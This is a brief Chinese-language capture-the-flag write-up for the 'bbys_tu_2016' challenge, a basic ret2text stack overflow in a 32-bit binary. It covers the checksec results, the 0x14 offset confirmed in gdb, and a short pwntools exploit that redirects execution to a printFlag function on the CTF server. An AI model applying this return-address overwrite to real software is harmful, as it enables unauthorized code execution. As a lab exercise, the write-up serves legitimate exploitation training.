bbys_tu_2016(write up)
一题 非常基础的ret2text
惯例先checksec一下
开启了nx防护的32位程序 放进ida里看看
main函数里有一个非常明显的栈溢出(一个小坑是ida里的偏移是错的得到gdb上去调试 结果是0x14)
找到了printFlag函数可以直接打印flag
exp:
from pwn import *
io=remote('node4.buuoj.cn',26969)
payload='a'*(0x14+4)+p32(0x804856D)
io.sendline(payload)
io.interactive()